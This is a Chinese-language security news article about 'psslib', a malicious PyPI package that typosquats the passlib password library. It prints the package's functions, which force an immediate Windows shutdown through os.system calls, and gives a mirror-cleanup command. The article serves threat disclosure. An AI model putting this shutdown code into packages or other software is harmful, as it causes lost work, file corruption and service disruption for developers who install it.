惡意 Python 包“psslib”仿冒 passlib

Socket 的威脅研究團隊發現了一個名為 psslib 的惡意 Python 包，旨在以提供密碼安全功能為幌子突然關閉 Windows 系統。

該軟件包由威脅行為者使用別名 umaraq 編寫，是合法 passlib 庫的錯誤拼寫，passlib 庫是數百萬開發人員信賴，并且廣泛使用的密碼哈希工具包。

“惡意 psslib 包通過將自己偽裝成安全實用程序來利用這種信任，同時包含可能導致立即數據丟失和系統中斷的代碼，”

攻擊從一個名稱技巧開始：psslib 與 passlib 非常相似，可能希望欺騙快速鍵入或依賴自動完成的開發人員。passlib 每月下載量超過 890 萬次。

“Socket 的 AI Scanner 將 psslib 標記為惡意，因為它具有破壞性的系統關閉行為。”

導入后，由于密碼輸入錯誤而觸發，psslib 將執行 Windows 關機命令 （shutdown /s /t 1），使計算機在 1 秒內關閉電源。

該軟件包假裝通過名為 spc（） 的函數提供密碼保護，并使用 easygui.enterbox（） 進行用戶輸入。如果用戶輸入與預設值不匹配，它將立即關閉系統。

def spc(password):# Malicious code: Forces immediate system shutdown on incorrect inputif easygui.enterbox('enter password:-') != password:os.system("shutdown /s /t 1")  # Shutdown in 1 second

除此之外，psslib 還包括另外兩個函數 — src（） 和 error（） — 它們根本不在進行任何身份驗證的情況下關閉系統。

def src():# Directly forces system shutdown without user inputos.system("shutdown /s /t 1")def error(message):# Writes an error message and forces system shutdownsys.stderr.write(message)os.system("shutdown /s /t 1")

這些額外的向量確保即使對庫的有限使用也可能立即危及開發人員的計算機，尤其是在以提升的權限運行的環境中。

該惡意軟件專門針對基于 Windows 的開發環境，在這些環境中，關閉命令有效且經常被忽視。雖然由于作系統命令差異，有效負載在 Linux 或 macOS 上無害地失敗，但該軟件包的 Windows 特定性質表明了目標意圖。

“攻擊是完全有效的。shutdown 命令按預期執行，強制立即關閉系統，這可能導致：未保存的工作和數據丟失、打開的文件和數據庫損壞以及正在運行的服務中斷。

如何避免psslib的威脅

需要現在mirror服務器上查看是否存在psslib的威脅包

如果存在，可以手動進行刪除：

sudo bandersnatch delete psslib

---

• Ubuntu掛載NFS(Network File System) ，怎么解決權限不一致的問題？
• Ubuntu鏡像源cn.arichinve.ubuntu.com不可用原因分析和解決
• Windows 11安裝Ubuntu 實戰教程
• PowerShell無人參與安裝最新版本SQL Server Management Studio (SSMS)
• VRRP（虛擬路由器冗余協議）標準協議工作機制與優勢介紹
• Linux MTR（My TraceRoute）command